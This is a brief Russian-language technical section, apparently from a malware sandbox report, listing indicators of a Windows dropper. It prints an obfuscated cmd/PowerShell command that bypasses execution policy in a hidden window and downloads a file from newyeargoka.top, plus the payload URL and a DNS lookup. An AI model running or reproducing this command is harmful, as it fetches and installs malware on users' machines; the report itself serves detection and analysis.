Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoweRs^HELl.EXe^ -eXec^UTion^POL^IC^y bY^p^AsS^ ^-noP^RofILe -^wIn^DOwsTy^le hi^dD^en ^(^nEw^-obj^ect^ ^S^Ys^Tem.^nEt.^W^EB^c^liEnt)^.do^wNLoAdfILe^('http://newyeargoka.top/re...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "PoweRs^HELl.EXe^ -eXec^UTion^POL^IC^y bY^p^AsS^ ^-noP^RofILe -^wIn^DOwsTy^le hi^dD^en ^(^nEw^-obj^ect^ ^S^Ys^Tem.^nEt.^W^EB^c^liEnt)^.do^wNLoAdfILe^('http://newyeargoka.top/re...' (со скрытым окном)